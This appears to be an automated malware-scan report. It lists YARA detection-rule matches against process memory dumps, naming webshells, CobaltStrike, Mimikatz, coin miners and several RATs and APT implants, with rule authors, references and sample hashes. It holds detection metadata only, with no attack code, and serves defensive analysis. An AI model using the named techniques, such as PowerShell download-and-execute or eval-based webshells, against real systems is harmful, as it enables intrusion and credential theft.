Source: 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000026.00000003.18326492976.00000138BE3E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_PowerShell_IEX_Download_Combo date = 2018-10-04, hash1 = 13297f64a5f4dd9b08922c18ab100d3a3e6fdeab82f60a4653ab975b8ce393d5, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_generic date = 2021/01/14, author = Arnim Rupp, description = php webshell having some kind of input and some kind of payload. restricted to small files or big ones inclusing suspicious strings, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = bee1b76b1455105d4bfe2f45191071cf05e83a309ae9defcf759248ca9bceddd
Source: 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_generic_eval date = 2021/01/07, author = Arnim Rupp, description = Generic PHP webshell which uses any eval/exec function in the same line with user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 90c5cc724ec9cf838e4229e5e08955eec4d7bf95
Source: 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: ChinaChopper_Generic date = 2015/03/10, author = Florian Roth, description = China Chopper Webshells - PHP and ASPX, reference = https://www.fireeye.com/content/dam/legacy/resources/pdfs/fireeye-china-chopper-report.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000026.00000003.18339634370.00000138BD24F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b
Source: 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_known_webshell date = 2021/01/09, author = Arnim Rupp, description = Known PHP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions., license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 7b6471774d14510cf6fa312a496eed72b614f6fc
Source: 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Oilrig_IntelSecurityManager date = 2018-01-19, author = Eyal Sela, description = Detects OilRig malware, reference = Internal Research
Source: 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18303554710.00000138BE851000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Script_Obfuscation_Char_Concat date = 2018-10-04, hash1 = b30cc10e915a23c7273f0838297e0d2c9f4fc0ac1f56100eef6479c9d036c12b, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: xtremrat date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0
Source: 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_PowerShell_IEX_Download_Combo date = 2018-10-04, hash1 = 13297f64a5f4dd9b08922c18ab100d3a3e6fdeab82f60a4653ab975b8ce393d5, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18345693514.00000138BE774000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 00000026.00000003.18329040392.00000138BCB04000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18415619805.00000138BD881000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000026.00000003.18415619805.00000138BD881000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000026.00000003.18306892097.00000138BD524000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 00000026.00000003.18344277872.00000138BE12C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000026.00000003.18344277872.00000138BE12C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
Source: 00000026.00000003.18409070283.00000138BD8C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000026.00000003.18409070283.00000138BD8C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18323946155.00000138BDB98000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_obfuscated_encoding date = 2021/04/18, author = Arnim Rupp, description = PHP webshell obfuscated by encoding, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000026.00000003.18417573092.00000138BD8B1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000026.00000003.18417573092.00000138BD8B1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000026.00000003.18352509630.00000138BD16D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp, type: MEMORY	Matched rule: WScriptShell_Case_Anomaly date = 2017-09-11, author = Florian Roth, description = Detects obfuscated wscript.shell commands, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000026.00000003.18330827201.00000138BE3D8000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000026.00000003.18410085130.00000138BD8C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000026.00000003.18410085130.00000138BD8C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000026.00000003.18314349341.00000138BD01D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_DeputyDog_Fexel author = ThreatConnect Intelligence Research Team
Source: 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: IMPLANT_5_v3 date = 2017-02-10, author = US CERT, description = XTunnel Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: malware_red_leaves_memory author = David Cannings, description = Red Leaves C&C left in memory, use with Volatility / Rekall
Source: 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Hacktool_Strings_p0wnedShell date = 2017-01-14, hash1 = e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60, author = Florian Roth, description = p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, reference = https://github.com/Cn33liz/p0wnedShell, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PoisonIvy_3 filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, cape_type = PoisonIvy Payload, ref = http://malwareconfig.com/stats/PoisonIvy
Source: 00000026.00000003.18337194064.00000138BDCA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000026.00000003.18337194064.00000138BDCA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000026.00000003.18337194064.00000138BDCA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
Source: 00000026.00000003.18408563136.00000138BD8B1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000026.00000003.18408563136.00000138BD8B1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp, type: MEMORY	Matched rule: korlia author = Nick Hoffman, reference = http://www.morphick.com/resources/lab-blog/curious-korlia, company = Morphick, information = korlia malware found in apt dump
Source: 00000026.00000003.18298692792.00000138BDFE8000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 00000026.00000003.18418537892.00000138BD8C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000026.00000003.18418537892.00000138BD8C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000001.00000003.14714384382.000002DEA1411000.00000004.00000001.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000026.00000003.18320722145.00000138BD946000.00000004.00000001.sdmp, type: MEMORY	Matched rule: HackTool_MSIL_SharPersist_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 98ecf58d48a3eae43899b45cec0fc6b7
Source: 00000026.00000003.18324581744.00000138BDC1C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: xtremrat date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0
Source: 00000026.00000003.18423541232.00000138BD8B1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000026.00000003.18423541232.00000138BD8B1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000026.00000003.18330538197.00000138BE396000.00000004.00000001.sdmp, type: MEMORY	Matched rule: WScriptShell_Case_Anomaly date = 2017-09-11, author = Florian Roth, description = Detects obfuscated wscript.shell commands, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18312795035.00000138BEAE5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Pupy_Backdoor date = 2017-08-11, hash5 = 06bb41c12644ca1761bcb3c14767180b673cb9d9116b555680073509e7063c3e, hash4 = 20e19817f72e72f87c794843d46c55f2b8fd091582bceca0460c9f0640c7bbd8, hash3 = 90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc, hash2 = 83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4, hash1 = ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153, author = Florian Roth, description = Detects Pupy backdoor, hash7 = 8784c317e6977b4c201393913e76fc11ec34ea657de24e957d130ce9006caa01, hash6 = be83c513b24468558dc7df7f63d979af41287e568808ed8f807706f6992bfab2, reference = https://github.com/n1nj4sec/pupy-binaries, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000026.00000003.18312795035.00000138BEAE5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18316462962.00000138BD524000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT9002Strings author = Seth Hardy, description = 9002 Identifying Strings, last_modified = 2014-06-25
Source: 00000026.00000003.18340288495.00000138BCB46000.00000004.00000001.sdmp, type: MEMORY	Matched rule: RemCom_RemoteCommandExecution date = 2017-12-28, author = Florian Roth, description = Detects strings from RemCom tool, reference = https://goo.gl/tezXZt, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000026.00000003.18357503095.00000138BE2D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000026.00000003.18424893452.00000138BD8C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000026.00000003.18424893452.00000138BD8C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
